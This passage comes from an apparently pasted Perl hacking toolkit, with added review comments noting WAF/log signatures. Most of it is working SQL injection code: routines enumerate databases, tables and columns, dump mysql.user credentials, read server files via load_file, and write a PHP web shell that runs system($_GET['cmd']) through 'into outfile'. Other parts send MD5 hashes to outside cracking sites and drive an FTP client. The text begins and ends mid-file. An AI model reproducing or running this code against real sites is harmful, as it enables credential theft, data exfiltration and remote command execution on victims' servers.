  794. $injection = $start . $concat . $end . $pass2;
  795. $code = toma($injection);
  796. if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
  797. print
  798. "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  799. savefile(
  800. $save . ".txt",
  801. "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"
  802. );
  803. }
  804. else {
  805. print "\n[-] Not found any data\n";
  806. }
  807. }
  808. }
  809.  
  810. sub menu_options {
  811.  
  812. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  813. my $save = $auth;
  814. print "\n/logs/webs/$save>";
  815. chomp( my $rta = <stdin> );
  816.  
  817. if ( $rta =~ /help/ ) {
  818. print qq(
  819.  
  820. commands : details tables columns dbs othertable othercolumn
  821. mysqluser dumper createshell readfile logs exit
  822.  
  823. );
  824. }
  825.  
  826. if ( $rta =~ /tables/ ) {
  827. schematables( $_[0], $_[1], $save );
  828. &reload;
  829. }
  830. elsif ( $rta =~ /columns (.*)/ ) {
  831. my $tabla = $1;
  832. schemacolumns( $_[0], $_[1], $save, $tabla );
  833. &reload;
  834. }
  835. elsif ( $rta =~ /dbs/ ) {
  836. &schemadb( $_[0], $_[1], $save );
  837. &reload;
  838. }
  839. elsif ( $rta =~ /othertable (.*)/ ) {
  840. my $data = $1;
  841. &schematablesdb( $_[0], $_[1], $data, $save );
  842. &reload;
  843. }
  844. elsif ( $rta =~ /othercolumn (.*) (.*)/ ) {
  845. my ( $db, $table ) = ( $1, $2 );
  846. &schemacolumnsdb( $_[0], $_[1], $db, $table, $save );
  847. &reload;
  848. }
  849. elsif ( $rta =~ /mysqluser/ ) {
  850. &mysqluser( $_[0], $_[1], $save );
  851. &reload;
  852. }
  853. elsif ( $rta =~ /logs/ ) {
  854. $t = "logs/webs/$save.txt";
  855. system("start $t");
  856. &reload;
  857. }
  858. elsif ( $rta =~ /exit/ ) {
  859. next;
  860. }
  861.  
  862. elsif ( $rta =~ /createshell/ ) {
  863. print "\n\n[Full Path Discloure] : ";
  864. chomp( my $path = <STDIN> );
  865. &into( $_[0], $_[1], $path, $save );
  866. }
  867. elsif ( $rta =~ /readfile/ ) {
  868. loadfile( $_[0], $_[1], $save );
  869. }
  870. elsif ( $rta =~ /dumper (.*) (.*) (.*)/ ) {
  871. my ( $tabla, $col1, $col2 ) = ( $1, $2, $3 );
  872. &dump( $_[0], $col1, $col2, $tabla, $_[1], $save );
  873. &reload;
  874. }
  875. elsif ( $rta =~ /details/ ) {
  876. &details( $_[0], $_[1], $save );
  877. &reload;
  878. }
  879. else {
  880. &reload;
  881. }
  882. }
  883.  
  884. sub schematables {
  885. $real = "1";
  886. my ( $page, $bypass, $save ) = @_;
  887. savefile( $save . ".txt", "\n" );
  888. print "\n";
  889. my $page1 = $page;
  890. ( $pass1, $pass2 ) = &bypass( $_[1] );
  891. savefile( $save . ".txt", "[DB] : default" );
  892. print "\n[+] Searching tables with schema\n\n";
  893. $page =~
  894. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  895. $page1 =~
  896. s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  897. $code =
  898. toma( $page1
  899. . $pass1 . "from"
  900. . $pass1
  901. . "information_schema.tables"
  902. . $pass2 );
  903.  
  904. if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  905. my $resto = $1;
  906. $total = $resto - 17;
  907. print "[+] Tables Length : $total\n\n";
  908. savefile( $save . ".txt", "[+] Searching tables with schema\n" );
  909. savefile( $save . ".txt", "[+] Tables Length : $total\n" );
  910. my $limit = $1;
  911. for my $limit ( 17 .. $limit ) {
  912. $code1 =
  913. toma( $page
  914. . $pass1 . "from"
  915. . $pass1
  916. . "information_schema.tables"
  917. . $pass1 . "limit"
  918. . $pass1
  919. . $limit . ",1"
  920. . $pass2 );
  921. if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
  922. my $table = $1;
  923. chomp $table;
  924. print "[Table $real Found : $table ]\n";
  925. savefile( $save . ".txt", "[Table $real Found : $table ]" );
  926. $real++;
  927. }
  928. }
  929. print "\n";
  930. }
  931. else {
  932. print "\n[-] information_schema = ERROR\n";
  933. }
  934. }
  935.  
  936. sub reload {
  937. &menu_options( $_[0] );
  938. }
  939.  
# Enumerate the column names of $table from information_schema.columns.
# Two request shapes go through toma() (the file-level LWP agent $nave):
# first a Count(*) query, then one query per column using "limit N,1".
# Every result line is printed and appended to logs/webs/<$save>.txt by
# savefile().
#   $page   - URL containing the literal "hackman", which the s/// below
#             replaces with the selected expression
#   $bypass - spacing style; bypass() maps it to ($pass1, $pass2), which
#             are package globals written here
#   $save   - log file basename (".txt" is appended)
#   $table  - table name, sent as char(<codes>) built by ascii()
# Also writes the package globals $code3, $code4 and $real.
# Detection note: each request carries the literal "RATSXPDOWN1"
# (char(82,65,84,83,88,80,68,79,87,78,49)) as a result delimiter; that
# string is a dependable web-log / WAF signature for this tool.
sub schemacolumns {
my ( $page, $bypass, $save, $table ) = @_;
# Separate copies of the URL for the count query and the per-column query.
my $page3 = $page;
my $page4 = $page;
savefile( $save . ".txt", "\n" );
print "\n";
( $pass1, $pass2 ) = &bypass($bypass);
print "\n[DB] : default\n";
savefile( $save . ".txt", "[DB] : default" );
savefile( $save . ".txt", "[Table] : $table\n" );
# Count query: the marker-wrapped Count(*) is passed through unhex(hex()).
$page3 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 =
toma( $page3
. $pass1 . "from"
. $pass1
. "information_schema.columns"
. $pass1 . "where"
. $pass1
. "table_name=char("
. ascii($table) . ")"
. $pass2 );

# $1 is the text between the two markers, i.e. the column count.
if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
print "\n[Columns Length : $1 ]\n\n";
savefile( $save . ".txt", "[Columns Length : $1 ]\n" );
my $si = $1;
chomp $si;
# Per-column query: same shape, selecting column_name with a LIMIT offset.
$page4 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";    # running index used only in the printed/logged lines
for my $limit2 ( 0 .. $si ) {
$code4 =
toma( $page4
. $pass1 . "from"
. $pass1
. "information_schema.columns"
. $pass1 . "where"
. $pass1
. "table_name=char("
. ascii($table) . ")"
. $pass1 . "limit"
. $pass1
. $limit2 . ",1"
. $pass2 );
if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
print "[Column $real] : $1\n";
savefile( $save . ".txt", "[Column $real] : $1" );
$real++;
}
}
print "\n";
}
else {
print "\n[-] information_schema = ERROR\n";
}
}
  997.  
# Enumerate database names from information_schema.schemata.
# First request counts the schemata, then one request per name with
# "limit N,1"; information_schema, mysql and phpmyadmin are filtered out
# of the printed/logged output.  Lines go to STDOUT and, via savefile(),
# to logs/webs/<$save>.txt.
#   $page   - URL containing the literal "hackman" placeholder
#   $bypass - spacing style, mapped to the package globals ($pass1, $pass2)
#   $save   - log file basename
# Also writes the package globals $code and $real.
# Detection note: the "RATSXPDOWN1" delimiter (char(82,65,...,49)) is
# present in every request and is a reliable log / WAF signature.
sub schemadb {
my ( $page, $bypass, $save ) = @_;
my $page1 = $page;    # second copy, used for the per-name query
savefile( $save . ".txt", "\n" );
print "\n\n[+] Searching DBS\n\n";
( $pass1, $pass2 ) = &bypass($bypass);
# Count query on the original URL copy.
$page =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code =
toma( $page . $pass1 . "from" . $pass1 . "information_schema.schemata" );
if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
my $limita = $1;    # number of schemata reported between the markers
print "[+] Databases Length : $limita\n\n";
savefile( $save . ".txt", "[+] Databases Length : $limita\n" );
# Per-name query selects schema_name instead of Count(*).
$page1 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";    # running index for the printed/logged lines
for my $limit ( 0 .. $limita ) {
$code =
toma( $page1
. $pass1 . "from"
. $pass1
. "information_schema.schemata"
. $pass1 . "limit"
. $pass1
. $limit . ",1"
. $pass2 );
if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
my $control = $1;
# Built-in / tooling schemas are skipped in the report.
if ( $control ne "information_schema"
and $control ne "mysql"
and $control ne "phpmyadmin" )
{
print "[Database $real Found] $control\n";
savefile( $save . ".txt",
"[Database $real Found] : $control" );
$real++;
}
}
}
print "\n";
}
else {
print "[-] information_schema = ERROR\n";
}
}
  1044.  
# Enumerate the table names of database $db from information_schema.tables.
# Positional arguments:
#   $_[0] - URL containing the literal "hackman" placeholder
#   $_[1] - spacing style, mapped to the package globals ($pass1, $pass2)
#   $_[2] - database name, sent as char(<codes>) built by ascii()
#   $_[3] - log file basename; output also goes to logs/webs/<$_[3]>.txt
# A Count(*) request is followed by one request per table ("limit N,1").
# Writes the package globals $code, $code1 and $real.
# Detection note: the "RATSXPDOWN1" delimiter (char(82,65,...,49)) appears
# in every request and is a reliable log / WAF signature.
sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;    # copy used for the count query
savefile( $_[3] . ".txt", "\n" );
print "\n\n[+] Searching tables with DB $db\n\n";
( $pass1, $pass2 ) = &bypass( $_[1] );
savefile( $_[3] . ".txt", "[DB] : $db" );
# $page: per-table query (table_name); $page1: count query (Count(*)).
$page =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code =
toma( $page1
. $pass1 . "from"
. $pass1
. "information_schema.tables"
. $pass1 . "where"
. $pass1
. "table_schema=char("
. ascii($db) . ")"
. $pass2 );

#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
print "[+] Tables Length : $1\n\n";
savefile( $_[3] . ".txt", "[+] Tables Length : $1\n" );
my $limit = $1;    # table count reported between the markers
$real = "1";    # running index for the printed/logged lines
for my $lim ( 0 .. $limit ) {
$code1 =
toma( $page
. $pass1 . "from"
. $pass1
. "information_schema.tables"
. $pass1 . "where"
. $pass1
. "table_schema=char("
. ascii($db) . ")"
. $pass1 . "limit"
. $pass1
. $lim . ",1"
. $pass2 );

#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
my $table = $1;
chomp $table;
savefile( $_[3] . ".txt", "[Table $real Found : $table ]" );
print "[Table $real Found : $table ]\n";
$real++;
}
}
print "\n";
}
else {
print "\n[-] information_schema = ERROR\n";
}
}
  1104.  
# Enumerate the column names of $table inside database $db from
# information_schema.columns (both table_name and table_schema are
# constrained, unlike schemacolumns()).  A Count(*) request is followed by
# one request per column with "limit N,1".  Output goes to STDOUT and, via
# savefile(), to logs/webs/<$save>.txt.
#   $page   - URL containing the literal "hackman" placeholder
#   $bypass - spacing style; note the call below reads it as $_[1], which
#             is the same value
#   $db     - database name, sent as char(<codes>) built by ascii()
#   $table  - table name, sent the same way
#   $save   - log file basename
# Writes the package globals $pass1, $pass2, $code3, $code4 and $real.
# Detection note: the "RATSXPDOWN1" delimiter (char(82,65,...,49)) appears
# in every request and is a reliable log / WAF signature.
sub schemacolumnsdb {
my ( $page, $bypass, $db, $table, $save ) = @_;
# Separate URL copies for the count query and the per-column query.
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile( $save . ".txt", "\n" );
( $pass1, $pass2 ) = &bypass( $_[1] );
savefile( $save . ".txt", "\n[DB] : $db" );
savefile( $save . ".txt", "[Table] : $table" );
$page3 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 =
toma( $page3
. $pass1 . "from"
. $pass1
. "information_schema.columns"
. $pass1 . "where"
. $pass1
. "table_name=char("
. ascii($table) . ")"
. $pass1 . "and"
. $pass1
. "table_schema=char("
. ascii($db) . ")"
. $pass2 );

# $1 is the column count reported between the markers.
if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
print "\n[Columns length : $1 ]\n\n";
savefile( $save . ".txt", "[Columns length : $1 ]\n" );
my $si = $1;
chomp $si;
$page4 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";    # running index for the printed/logged lines
for my $limit2 ( 0 .. $si ) {
$code4 =
toma( $page4
. $pass1 . "from"
. $pass1
. "information_schema.columns"
. $pass1 . "where"
. $pass1
. "table_name=char("
. ascii($table) . ")"
. $pass1 . "and"
. $pass1
. "table_schema=char("
. ascii($db) . ")"
. $pass1 . "limit"
. $pass1
. $limit2 . ",1"
. $pass2 );
if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
print "[Column $real] : $1\n";
savefile( $save . ".txt", "[Column $real] : $1" );
$real++;
}
}
}
else {
print "\n[-] information_schema = ERROR\n";
}
print "\n";
}
  1169.  
# Read Host/User/Password from mysql.user.  Three request shapes are sent
# through toma(): a probe that only checks the marker comes back, a Count(*)
# query, then one row per request with "limit N,1".  Lines are printed and
# appended to logs/webs/<$save>.txt via savefile().
#   $page   - URL containing the literal "hackman" placeholder
#   $bypass - spacing style, mapped to the package globals ($pass1, $pass2)
#   $save   - log file basename
# Writes the package globals $code and $code1.
# Detection note: the delimiter here is "RATSXPDOWN" without the trailing
# "1", both as char(82,65,...,78) and as the hex literal
# 0x524154535850444f574e; either form is a reliable log / WAF signature.
sub mysqluser {
my ( $page, $bypass, $save ) = @_;
# $cop: per-row query copy; $cop1: count query copy.
my $cop = $page;
my $cop1 = $page;
savefile( $save . ".txt", "\n" );
print "\n\n[+] Finding mysql.users\n";
( $pass1, $pass2 ) = &bypass($bypass);
# Probe: only the bare marker is selected; a hit means mysql.user is readable.
$page =~ s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma( $page . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );

if ( $code =~ /RATSXPDOWN/ig ) {
$cop1 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 =
toma( $cop1 . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
print "\n[+] Users Found : $1\n\n";
savefile( $save . ".txt", "\n[+] Users mysql Found : $1\n" );
for my $limit ( 0 .. $1 ) {
# The s/// only changes $cop on the first iteration; later iterations
# reuse the already-substituted URL.
$cop =~
s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code =
toma( $cop
. $pass1 . "from"
. $pass1
. "mysql.user"
. $pass1 . "limit"
. $pass1
. $limit . ",1"
. $pass2 );
if ( $code =~
/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig )
{
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile( $save . ".txt",
"[Host] : $1 [User] : $2 [Password] : $3" );
}
else {
print "\n";
# "&reload;" without parentheses passes this sub's own @_ through.
&reload;
}
}
}
}
else {
print "\n[-] mysql.user = ERROR\n\n";
}
}
  1218.  
# Read two columns of a table row by row.  Positional arguments:
#   $_[0] - URL containing the literal "hackman" placeholder; the text
#           before/after it becomes $start/$end
#   $_[1] - first column name (also used for count($_[1]))
#   $_[2] - second column name
#   $_[3] - table name
#   $_[4] - spacing style, mapped to the package globals ($pass1, $pass2)
#   $_[5] - log file basename; output also goes to logs/webs/<$_[5]>.txt
# A count request is followed by one request per row with "limit N,1".
# Writes the package globals $concatx, $val_code, $concat, $tota, $injection.
# Detection note: the delimiter here is "ERTOR854"
# (char(69,82,84,79,82,56,53,52)), present in every request.
sub dump {
savefile( $_[5] . ".txt", "\n" );
my $page = $_[0];
( $pass1, $pass2 ) = &bypass( $_[4] );
if ( $page =~ /(.*)hackman(.*)/ ) {
my $start = $1;
my $end = $2;
print "\n\n[+] Extracting values...\n\n";
# Count expression, wrapped in the marker.
$concatx =
"unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code =
toma( $start
. $concatx
. $end
. $pass1 . "from"
. $pass1
. $_[3]
. $pass2 );
# Row expression: both columns, each followed by the marker.
$concat =
"unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ( $val_code =~ /ERTOR854(.*)ERTOR854/ig ) {
$tota = $1;    # row count reported between the markers
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile( $_[5] . ".txt", "[Table] : $_[3]" );
savefile( $_[5] . ".txt", "[+] Length of the rows: $tota\n" );
savefile( $_[5] . ".txt", "[$_[1]] [$_[2]]\n" );
for my $limit ( 0 .. $tota ) {
chomp $limit;    # no-op: $limit is a number from the range
$injection =
toma( $start
. $concat
. $end
. $pass1 . "from"
. $pass1
. $_[3]
. $pass1 . "limit"
. $pass1
. $limit . ",1"
. $pass2 );
if ( $injection =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854/ig ) {
savefile( $_[5] . ".txt", "[$_[1]] : $1 [$_[2]] : $2" );
print "[$_[1]] : $1 [$_[2]] : $2\n";
}
else {
# First row without markers ends the loop; the &reload; after
# `last` is never reached.
print "\n\n[+] Extracting Finish\n\n";
last;
&reload;
}
}
}
else {
print "[-] Not Found any DATA\n\n";
}
}
}
  1276.  
# Read a server-side file through load_file(): the path is asked for on
# STDIN, hex-encoded by encode(), and the marker-wrapped result is printed
# between "[Source Start]"/"[Source End]" and appended to
# logs/webs/<$_[2]>.txt.  Positional arguments:
#   $_[0] - URL containing the literal "hackman" placeholder
#   $_[1] - spacing style, mapped to the package globals ($pass1, $pass2)
#   $_[2] - log file basename
# Writes the package global $concat.  Always ends by calling reload() with
# this sub's own @_ (the "&reload;" form).
# Detection note: the delimiter is "k0bra" (char(107,48,98,114,97)).
sub loadfile {
savefile( $_[2] . ".txt", "\n" );
( $pass1, $pass2 ) = &bypass( $_[1] );
if ( $_[0] =~ /(.*)hackman(.*)/g ) {
my $start = $1;
my $end = $2;
print "\n\n[+] File to read : ";
chomp( my $file = <stdin> );
$concat =
"unhex(hex(concat(char(107,48,98,114,97),load_file("
. encode($file)
. "),char(107,48,98,114,97))))";
my $code = toma( $start . $concat . $end . $pass2 );
chomp $code;
# /s so the captured file body may span multiple lines.
if ( $code =~ /k0bra(.*)k0bra/s ) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile( $_[2] . ".txt", "[File Found] : $file" );
savefile( $_[2] . ".txt", "\n[Source Start]\n" );
savefile( $_[2] . ".txt", "$1" );
savefile( $_[2] . ".txt", "\n[Source End]\n" );
}
}
&reload;
}
  1304.  
# Write a file named "shell.php" under $dir on the database host via
# "into outfile", then fetch http://<host>/<$path2>/shell.php and report
# "[shell up]" when the response contains the title "Mini Shell By Doddy".
#   $page   - URL containing the literal "hackman" placeholder
#   $bypass - spacing style, mapped to the package globals ($pass1, $pass2)
#   $dir    - filesystem directory used to build the outfile path
#   $save   - log file basename; output also goes to logs/webs/<$save>.txt
# The long hex literal is the file body as written by the query.  Writes
# the package globals $shell, $code and $code1, and ends with "&reload;",
# which passes this sub's own @_ on.
# Detection note: the file name "shell.php", the title string above and a
# query containing "into outfile" are all indicators of this routine.
sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ( $page, $bypass, $dir, $save ) = @_;
savefile( $save . ".txt", "\n" );
print "\n";
( $pass1, $pass2 ) = &bypass($bypass);
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
# $path2: copy of the capture with $1 (the same capture) removed;
# $dir: with $path1 removed.
my $path2 = $path1;
$path2 =~ s/$1//;
$dir =~ s/$path1//ig;
$shell = $dir . "/" . "shell.php";
if ( $page =~ /(.*)hackman(.*)/ig ) {
my ( $start, $end ) = ( $1, $2 );
$code =
toma( $start
. "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
. $end
. $pass1 . "into"
. $pass1
. "outfile"
. $pass1 . "'"
. $shell . "'"
. $pass2 );
# Verification request against the web root.
$code1 =
toma( "http://" . $auth . "/" . $path2 . "/" . "shell.php" );
if ( $code1 =~ /Mini Shell By Doddy/ig ) {
print "[shell up] : http://" . $auth . "/" . $path2 . "/"
. "shell.php\a";
savefile(
$save . ".txt",
"[shell up] : http://"
. $auth . "/"
. $path2 . "/"
. "shell.php"
);
}
else {
print "[shell] : Not Found\n";
}
}
}
print "\n\n";
&reload;
}
  1351.  
  1352. sub bypass {
  1353. if ( $_[0] eq "/*" ) { return ( "/**/", "/*" ); }
  1354. elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
  1355. else { return ( "+", "--" ); }
  1356. }
  1357.  
  1358. sub ascii {
  1359. return join ',', unpack "U*", $_[0];
  1360. }
  1361.  
  1362. sub base {
  1363. $re = encode_base64( $_[0] );
  1364. chomp $re;
  1365. return $re;
  1366. }
  1367.  
  1368. sub base_de {
  1369. $re = decode_base64( $_[0] );
  1370. chomp $re;
  1371. return $re;
  1372. }
  1373.  
  1374. sub download {
  1375. if ( $nave->mirror( $_[0], $_[1] ) ) {
  1376. if ( -f $_[1] ) {
  1377. return true;
  1378. }
  1379. }
  1380. }
  1381.  
  1382. sub hex_en {
  1383. my $string = $_[0];
  1384. $hex = '0x';
  1385. for ( split //, $string ) {
  1386. $hex .= sprintf "%x", ord;
  1387. }
  1388. return $hex;
  1389. }
  1390.  
  1391. sub hex_de {
  1392. my $text = shift;
  1393. $text =~ s/^0x//;
  1394. $encode = join q[], map { chr hex } $text =~ /../g;
  1395. return $encode;
  1396. }
  1397.  
  1398. sub ascii_de {
  1399. my $text = shift;
  1400. $text = join q[], map { chr } split q[,], $text;
  1401. return $text;
  1402. }
  1403.  
  1404. sub getprocess {
  1405.  
  1406. my %procesos;
  1407.  
  1408. my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
  1409. my $dos = $uno->ConnectServer( "", "root\\cimv2" );
  1410.  
  1411. foreach my $pro ( in $dos->InstancesOf("Win32_Process") ) {
  1412. $procesos{ $pro->{Caption} } = $pro->{ProcessId};
  1413. }
  1414. return %procesos;
  1415. }
  1416.  
  1417. sub killprocess {
  1418.  
  1419. my $pid = shift;
  1420.  
  1421. if ( Win32::Process::KillProcess( $pid, "" ) ) {
  1422. return true;
  1423. }
  1424. else {
  1425. return false;
  1426. }
  1427. }
  1428.  
  1429. sub getip {
  1430. my $get = gethostbyname( $_[0] );
  1431. return inet_ntoa($get);
  1432. }
  1433.  
# Look an MD5 hash up on several third-party web services.  For "get"
# entries the hash is appended to the URL and fetched with toma(); for the
# others tomar() POSTs the listed variables.  When an entry's regex matches
# the response, "<hash>:<match>" is appended to logs/pass-found.txt via
# saveyes() (and, for "get" entries, also printed).  Writes the package
# global $code.
# Note: the hash is sent in clear to every listed site; treat the list as
# a set of outbound IoCs for this tool.
sub crackit {

my $secret = $_[0];

print "[+] Cracking $_[0]\n\n";

# Service table: URL => { tipo => get|post, variables => POST form text,
# regex => pattern that captures the clear text }.
my %hash = (

'http://passcracking.com/' => {
'tipo' => 'post',
'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex' =>
'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},
'http://md5.hashcracking.com/search.php?md5=' => {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' => {
'tipo' => 'post',
'variables' => '{"query" => $_[0], "submit" => " Crack "}',
'regex' =>
'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' => {
'tipo' => 'post',
'variables' =>
'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' => {
'tipo' => 'post',
'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
'regex' =>
'<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
# NOTE(review): the non-ASCII word below renders as mojibake here; it
# looks like a Cyrillic label mangled by the paste encoding — confirm
# against the original source before relying on this pattern.
'http://victorov.su/md5/?md5e=&md5d=' => {
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);

for my $data ( keys %hash ) {

if ( $hash{$data}{tipo} eq "get" ) {
$code = toma( $data . $_[0] );
if ( $code =~ /$hash{$data}{regex}/ig ) {
print "\n[+] Decoded : " . $1 . "\n\n";
saveyes( "logs/pass-found.txt", $secret . ":" . $1 );
}
}
else {
$code = tomar( $data, $hash{$data}{variables} );
if ( $code =~ /$hash{$data}{regex}/ig ) {
saveyes( "logs/pass-found.txt", $secret . ":" . $1 );
}
}
}
print "\n[+] Finish\n";
}
  1494.  
  1495. sub ftp {
  1496.  
  1497. my ( $ftp, $user, $pass ) = @_;
  1498.  
  1499. if ( my $socket = Net::FTP->new($ftp) ) {
  1500. if ( $socket->login( $user, $pass ) ) {
  1501.  
  1502. print "\n[+] Enter of the server FTP\n\n";
  1503.  
  1504. menu:
  1505.  
  1506. print "\n\nftp>";
  1507. chomp( my $cmd = <stdin> );
  1508. print "\n\n";
  1509.  
  1510. if ( $cmd =~ /help/ ) {
  1511. print q(
  1512.  
  1513. help : show information
  1514. cd : change directory <dir>
  1515. dir : list a directory
  1516. mdkdir : create a directory <dir>
  1517. rmdir : delete a directory <dir>
  1518. pwd : directory
  1519. del : delete a file <file>
  1520. rename : change name of the a file <file1> <file2>
  1521. size : size of the a file <file>
  1522. put : upload a file <file>
  1523. get : download a file <file>
  1524. cdup : change dir <dir>
  1525. exit : ??
  1526.  
  1527.  
  1528. );
  1529. }
  1530.  
  1531. if ( $cmd =~ /dir/ig ) {
  1532. if ( my @files = $socket->dir() ) {
  1533. for (@files) {
  1534. print "[+] " . $_ . "\n";
  1535. }
  1536. }
  1537. else {
  1538. print "\n\n[-] Error\n\n";
  1539. }
  1540. }
  1541.  
  1542. if ( $cmd =~ /pwd/ig ) {
  1543. print "[+] Path : " . $socket->pwd() . "\n";
  1544. }
  1545.  
  1546. if ( $cmd =~ /cd (.*)/ig ) {
  1547. if ( $socket->cwd($1) ) {
  1548. print "[+] Directory changed\n";
  1549. }
  1550. else {
  1551. print "\n\n[-] Error\n\n";
  1552. }
  1553. }
  1554.  
  1555. if ( $cmd =~ /cdup/ig ) {
  1556. if ( my $dir = $socket->cdup() ) {
  1557. print "\n\n[+] Directory changed\n\n";
  1558. }
  1559. else {
  1560. print "\n\n[-] Error\n\n";
  1561. }
  1562. }
  1563.  
  1564. if ( $cmd =~ /del (.*)/ig ) {
  1565. if ( $socket->delete($1) ) {
  1566. print "[+] File deleted\n";
  1567. }
  1568. else {
  1569. print "\n\n[-] Error\n\n";
  1570. }
  1571. }
  1572.  
  1573. if ( $cmd =~ /rename (.*) (.*)/ig ) {
  1574. if ( $socket->rename( $1, $2 ) ) {
  1575. print "[+] File Updated\n";
  1576. }
  1577. else {
  1578. print "\n\n[-] Error\n\n";
  1579. }
  1580. }
  1581.  
  1582. if ( $cmd =~ /mkdir (.*)/ig ) {
  1583. if ( $socket->mkdir($1) ) {
  1584. print "\n\n[+] Directory created\n";
  1585. }
  1586. else {
  1587. print "\n\n[-] Error\n\n";
  1588. }
  1589. }
  1590.  
  1591. if ( $cmd =~ /rmdir (.*)/ig ) {
  1592. if ( $socket->rmdir($1) ) {
  1593. print "\n\n[+] Directory deleted\n";
  1594. }
  1595. else {
  1596. print "\n\n[-] Error\n\n";
  1597. }
  1598. }
  1599.  
  1600. if ( $cmd =~ /exit/ig ) {
  1601. next;
  1602. }
  1603.  
  1604. if ( $cmd =~ /get (.*) (.*)/ig ) {
  1605. print "\n\n[+] Downloading file\n\n";
  1606. if ( $socket->get( $1, $2 ) ) {
  1607. print "[+] Download completed";
  1608. }
  1609. else {
  1610. print "\n\n[-] Error\n\n";
  1611. }
  1612. }
  1613.  
  1614. if ( $cmd =~ /put (.*) (.*)/ig ) {
  1615. print "\n\n[+] Uploading file\n\n";
